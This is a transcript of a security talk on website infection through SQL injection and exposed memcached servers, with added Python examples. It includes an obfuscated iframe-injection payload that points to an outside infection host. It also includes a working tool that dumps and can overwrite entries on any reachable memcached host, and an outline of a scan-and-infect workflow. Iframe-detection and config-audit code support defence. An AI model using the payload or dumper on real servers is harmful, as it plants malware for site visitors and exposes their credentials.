[FTP|SQL|Cache] Injections
David Barroso, Head of Security Intelligence, Telefonica Digital
Transcript of "[FTP|SQL|Cache] Injections"

  1. [FTP|SQL|Cache] Injections. David Barroso, Head of Security Intelligence, Telefonica Digital
  2. Screenshot: http://www.iframeinjectionattack.com/how-to-remove-this-site-may-harm-your-computer.html
  3. Agenda: Introduction, Cache basics, Demo, Summary
  4. How can I infect a web site? Or: how can I forward its visitors to a web page I control?
  5. MPack: the attacker compromises a legitimate web server (www.mydomain.com) and injects an iframe. The visitor browses a normal web site that now carries the malicious iframe and is forwarded to the infection kit; the malcode then connects back to the C&C.
  6. First option. Difficulty: easy
  7-8. (screenshots only)
  9. SQL Injection. Difficulty: easy
  10-13. (screenshots only)
  14. Things to consider. Which users do I want to infect? Focus your efforts (example: Brazilian web pages). SEO and web ranking: Alexa ranking. It's not only about infection; sometimes it's only about web ranking: spam comments in blogs, playing with HTML entities (e.g. <noscript>).
  15. Second option. Difficulty: medium
  16-21. (screenshots only)
  22. Choose your preferred infection kit: 99% are LAMP (Linux + Apache + MySQL + PHP)
  23-27. (screenshots only)
  28. Simple: <iframe src='http://www.malicious.com'></iframe>
      Not so simple: <Script Language=Javascript>document.write(unescape(%3C%69%66%72%61%6D%65%20%73%72%6 73%3%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%3E%3C%2F%69%66%72%61%6D%65%3E));</Script>
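The "not so simple" variant on this slide defeats a grep for "<iframe" on the cached page, because the tag only exists after the browser runs unescape(). The Python below is an added example, not code from the talk or from any kit: it decodes document.write(unescape(...)) wrappers, then reports iframes whose src points off-site and flags the 1x1 / visibility:hidden styling that infection kits use. The sample pages, the kit.example domain and the own-host list are constructed for the demonstration.

```python
"""Find injected iframes in cached page HTML, including the obfuscated form on
the slide: <Script>document.write(unescape("%3C%69%66...")) </Script>.

Added example, not from the talk or from any kit. The sample pages and the
kit.example domain below are constructed for the demonstration."""
import re
from typing import Dict, Iterable, List
from urllib.parse import quote, unquote, urlparse

UNESCAPE_RE = re.compile(r"unescape\(\s*['\"]?([^'\")]+)['\"]?\s*\)", re.I)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"src\s*=\s*['\"]?([^'\"\s>]+)", re.I)

def deobfuscate(html: str, max_rounds: int = 3) -> str:
    """Replace every unescape(<encoded>) with its decoded text, a few rounds deep
    since kits nest the wrapper. JavaScript unescape() handles %XX and %uXXXX;
    unquote() covers %XX, which is all the slide's sample uses."""
    for _ in range(max_rounds):
        decoded = UNESCAPE_RE.sub(lambda m: unquote(m.group(1)), html)
        if decoded == html:
            return html
        html = decoded
    return html

def is_hidden(tag: str) -> bool:
    """Kit iframes hide themselves: 0/1-pixel size, visibility:hidden or display:none."""
    t = tag.lower()
    size = re.search(r"(width|height)\s*=\s*['\"]?[01](?!\d)", t)
    compact = t.replace(" ", "")
    return bool(size) or "visibility:hidden" in compact or "display:none" in compact

def find_iframes(html: str, own_hosts: Iterable[str]) -> List[Dict[str, object]]:
    """Iframes whose src host is not one of ours. Decoding first is what makes the
    unescape()-wrapped variant visible. Relative src (no host) is left alone."""
    own = {h.lower() for h in own_hosts}
    findings: List[Dict[str, object]] = []
    for tag in IFRAME_RE.findall(deobfuscate(html)):
        m = SRC_RE.search(tag)
        src = m.group(1) if m else ""
        host = (urlparse(src).hostname or "").lower()
        if host and host not in own:
            findings.append({"src": src, "host": host, "hidden": is_hidden(tag)})
    return findings

# Constructed samples. PAGE_SIMPLE carries the slide's plain iframe; PAGE_OBFUSCATED
# wraps a hidden 1x1 iframe the way the slide's second sample does, percent-encoded
# here with quote() so the bytes are right. kit.example is a placeholder domain.
HIDDEN_IFRAME = ("<iframe src=http://kit.example/in.php width=1 height=1 "
                 "style=visibility:hidden;position:absolute></iframe>")
PAGE_SIMPLE = ("<html><body><h1>Welcome</h1>"
               "<iframe src='http://www.malicious.com'></iframe></body></html>")
PAGE_OBFUSCATED = ("<html><body><h1>Welcome</h1><Script Language=Javascript>"
                   f'document.write(unescape("{quote(HIDDEN_IFRAME, safe="")}"));'
                   "</Script></body></html>")
PAGE_CLEAN = ("<html><body><iframe src='https://www.mydomain.com/widget'></iframe>"
              "</body></html>")

if __name__ == "__main__":
    for name, page in (("simple", PAGE_SIMPLE), ("obfuscated", PAGE_OBFUSCATED),
                       ("clean", PAGE_CLEAN)):
        print(name, find_iframes(page, ["www.mydomain.com"]))
```

Run over a dump of cached page values, the same function separates legitimate embeds on your own hosts from an injected off-site frame, and the hidden flag is the signal worth alerting on first.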
  29. And how is a web cache related? Specifically: memcached
  30. Cache: a component that transparently stores data so that future requests for that data can be served faster. The data stored within a cache might be values that have been computed earlier or duplicates of original values stored elsewhere (Wikipedia). Examples: CPU, disk, DNS, ARP, etc. Main security attack: poisoning.
  32. memcached: created in 2003 for LiveJournal. An associative array (hash table), memory-based; used by YouTube, Reddit, Facebook, Orange, Twitter, etc. Keys up to 250 bytes, values up to 1 MB. Default port: 11211/tcp. No authentication, so some caches are reachable from the Internet. Optional (and not often used): SASL.
  33. Telnet-based commands: set (flags, timeout, bytes), get, stats, stats items, stats cachedump.
  34. SensePost analyzed the security issues back in 2010 and developed go-derper.rb: identification, storage of keys and values, regular expressions, and it can overwrite existing keys and values. Main problems: which web app is using these data? How can I find 'interesting' data?
  35. Infections: iFrame/JS malicious injection. Confidential information: passwords, prices!
  36. Let's see some practical stuff. Take care with all those memcached instances!
  37. Demo: memcached access, key/value storage
  38. Commands typed in the demo: set FIRST 0 0 11, followed by the 11-byte data line Hello FIRST; then get FIRST, stats items, and stats cachedump n 10 (n is a slab id from stats items).
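What the demo types by hand over telnet, written out as an added Python example (not go-derper.rb and not code from the talk): it frames set with the byte count the protocol insists on, then walks stats items, stats cachedump and get as slides 33 and 34 describe, keeping only the values that look like cached HTML. The three-key canned server is constructed so the walk runs offline; passing a host on the command line runs the same walk against a real 11211/tcp listener.

```python
"""Speak the memcached text protocol the way the demo does over telnet.

Added example (not go-derper.rb and not code from the talk): frames a set,
walks stats items -> stats cachedump -> get, and keeps the values that look
like cached HTML, which is what a cache-injection tool hunts for."""
import re
import socket
import sys
from typing import Callable, Dict, List

CRLF = b"\r\n"
Sender = Callable[[bytes], bytes]  # sends one command, returns the raw reply

def build_set(key: str, value: bytes, flags: int = 0, exptime: int = 0) -> bytes:
    """Frame a set. The length field must equal the data block's byte count: the
    slide's `set FIRST 0 0 11` carries the 11-byte `Hello FIRST`."""
    if not key or len(key) > 250 or re.search(r"[\s\x00]", key):
        raise ValueError("keys are at most 250 bytes with no whitespace or NUL")
    return f"set {key} {flags} {exptime} {len(value)}".encode() + CRLF + value + CRLF

def parse_stats_items(text: str) -> Dict[int, int]:
    """stats items reply -> {slab_id: item_count} from `STAT items:1:number 3` lines."""
    return {int(s): int(n) for s, n in re.findall(r"STAT items:(\d+):number (\d+)", text)}

def parse_cachedump(text: str) -> List[str]:
    """stats cachedump reply -> key names from `ITEM key [11 b; 0 s]` lines."""
    return re.findall(r"^ITEM (\S+) \[", text, re.M)

def parse_get(raw: bytes) -> Dict[str, bytes]:
    """get reply: VALUE <key> <flags> <bytes>\\r\\n<data>\\r\\n ... END\\r\\n. Data is
    sliced by the announced byte count, not by searching for CRLF, because
    cached HTML routinely contains CRLF itself."""
    items: Dict[str, bytes] = {}
    pos = 0
    while True:
        eol = raw.index(CRLF, pos)
        header = raw[pos:eol].decode()
        if header == "END":
            return items
        _, key, _flags, nbytes = header.split()[:4]
        start = eol + len(CRLF)
        end = start + int(nbytes)
        items[key] = raw[start:end]
        pos = end + len(CRLF)

def looks_like_html(value: bytes) -> bool:
    """Cheap filter for page fragments: the deck looks for HTML before planting an iframe."""
    head = value[:4096].lower()
    return any(t in head for t in (b"<html", b"<body", b"<div", b"<script", b"<iframe"))

def dump_html_entries(send: Sender, per_slab: int = 100) -> Dict[str, bytes]:
    """The go-derper style walk: stats items -> cachedump per slab -> get -> filter."""
    html: Dict[str, bytes] = {}
    for slab in parse_stats_items(send(b"stats items" + CRLF).decode()):
        keys = parse_cachedump(send(f"stats cachedump {slab} {per_slab}".encode() + CRLF).decode())
        if keys:
            values = parse_get(send(b"get " + " ".join(keys).encode() + CRLF))
            html.update({k: v for k, v in values.items() if looks_like_html(v)})
    return html

def tcp_sender(sock: socket.socket) -> Sender:
    """Sender over a real 11211/tcp connection. Every command used here ends its
    reply with END, so read until that terminator (a value that itself ends in
    END would cut the read short: fine for a scan, not for a production client)."""
    def send(cmd: bytes) -> bytes:
        sock.sendall(cmd)
        buf = b""
        while not buf.endswith(b"END" + CRLF):
            chunk = sock.recv(65536)
            if not chunk:
                break
            buf += chunk
        return buf
    return send

def canned_sender() -> Sender:
    """Constructed stand-in for a server holding three keys, so the walk runs offline."""
    store = {"FIRST": b"Hello FIRST",
             "page:/index.html": b"<html>\r\n<body>Welcome</body></html>",
             "session:42": b"user=alice;price=199"}
    def send(cmd: bytes) -> bytes:
        words = cmd.split()
        if words[:2] == [b"stats", b"items"]:
            return f"STAT items:1:number {len(store)}\r\n".encode() + b"END" + CRLF
        if words[:2] == [b"stats", b"cachedump"]:
            return "".join(f"ITEM {k} [{len(v)} b; 0 s]\r\n" for k, v in store.items()).encode() + b"END" + CRLF
        if words[:1] == [b"get"]:
            wanted = [w.decode() for w in words[1:] if w.decode() in store]
            return b"".join(f"VALUE {k} 0 {len(store[k])}\r\n".encode() + store[k] + CRLF for k in wanted) + b"END" + CRLF
        return b"ERROR" + CRLF
    return send

if __name__ == "__main__":
    if len(sys.argv) > 1:  # e.g. python3 memcdump.py 10.0.0.5
        with socket.create_connection((sys.argv[1], 11211), timeout=5) as s:
            found = dump_html_entries(tcp_sender(s))
    else:
        found = dump_html_entries(canned_sender())
    for key, val in found.items():
        print(f"{key}: {len(val)} bytes of cached HTML")
```

Overwriting a found entry, the step the next demo performs, is just build_set() with the same key and a modified value sent through the same Sender; the server accepts it because nothing authenticates the writer.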
  39. Demo: overwriting values (iFrame, infection kit)
  40. iFrame injection (screenshot)
  41. Demo: password sniffing, data mangling (prices)
  42. Password sniffing (screenshot)
  43-44. Data mangling (prices) (screenshots)
  45. Source: http://www.sensepost.com/blog/4873.html
  46. CacheT: an alternative to FTP-Toolz and SQL Injection Kitz. A go-derper.rb patch, proof of concept. Once you find some memcached hosts (nmap): dump all their entries, look for HTML data, inject malicious content (iFrame/JavaScript). Not published yet (it only has malicious purposes).
  47. Protect your memcached from external access: firewall it and listen only on localhost. We haven't seen malicious infections using these caches, but it's a very attractive asset, because many of the large websites are using it. From the malicious point of view, it doesn't matter if you don't know which web app is behind it. It's very easy to code a tool that scans for open memcached (or similar caches) and then infects all of them: nmap + go-derper.rb.
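As an added example (not from the talk) of the check behind "listen only on localhost", this Python audits a Debian-style memcached.conf (one option per line) or the daemon's command line for the -l binding, and reports whether the SASL option the earlier slide calls optional is on. The three config snippets are constructed: the weak one omits -l, so memcached binds every interface; the hardened one is the stock Debian binding.

```python
"""Check how memcached is bound: firewall it, listen only on localhost.
Reads Debian-style /etc/memcached.conf (one option per line, e.g. `-l 127.0.0.1`)
or the daemon's command line.

Added example, not from the talk. The config snippets are constructed."""
import ipaddress
import re
from typing import List, Tuple

WILDCARD = {"0.0.0.0", "::"}
Finding = Tuple[str, str]  # (severity, message)

def _strip_port(addr: str) -> str:
    """-l accepts host[:port]; IPv6 with a port is written [::1]:11211."""
    if addr.startswith("["):
        return addr[1:addr.index("]")]
    if addr.count(":") == 1:
        return addr.split(":")[0]
    return addr

def listen_addresses(config: str) -> List[str]:
    """Every -l / --listen value; memcached takes a comma-separated list."""
    out: List[str] = []
    for m in re.finditer(r"(?m)^\s*(?:-l|--listen)[ =]+(\S+)", config):
        out.extend(_strip_port(a) for a in m.group(1).split(","))
    return out

def audit(config: str) -> List[Finding]:
    """High findings mean the cache is reachable off-box with no authentication."""
    findings: List[Finding] = []
    addrs = listen_addresses(config)
    if not addrs:
        findings.append(("high", "no -l option: memcached binds every interface by default"))
    for a in addrs:
        if a in WILDCARD:
            findings.append(("high", f"-l {a} exposes 11211/tcp on all interfaces"))
            continue
        try:
            ip = ipaddress.ip_address(a)
        except ValueError:
            findings.append(("warn", f"-l {a} is a hostname; resolve it and confirm it is loopback"))
            continue
        if not ip.is_loopback:
            findings.append(("high", f"-l {a} is reachable from the network; restrict it with a firewall"))
    if not re.search(r"(?m)^\s*(?:-S|--enable-sasl)\b", config):
        findings.append(("info", "SASL (-S) is off: anyone who reaches the port can read and overwrite keys"))
    return findings

# Constructed snippets. Debian's stock file binds 127.0.0.1; the weak one simply omits -l.
CONF_WEAK = "-d\nlogfile /var/log/memcached.log\n-m 64\n-p 11211\n-u memcache\n"
CONF_EXPOSED = CONF_WEAK + "-l 0.0.0.0\n"
CONF_HARDENED = CONF_WEAK + "-l 127.0.0.1\n"

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else CONF_WEAK
    for severity, message in audit(text):
        print(f"[{severity}] {message}")
```

Binding to loopback only helps when the web tier runs on the same host; where the cache sits on its own box, the -l address is necessarily routable and the firewall rule on 11211/tcp is the control that matters.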
  48. Thank you. David Barroso, @lostinsecurity
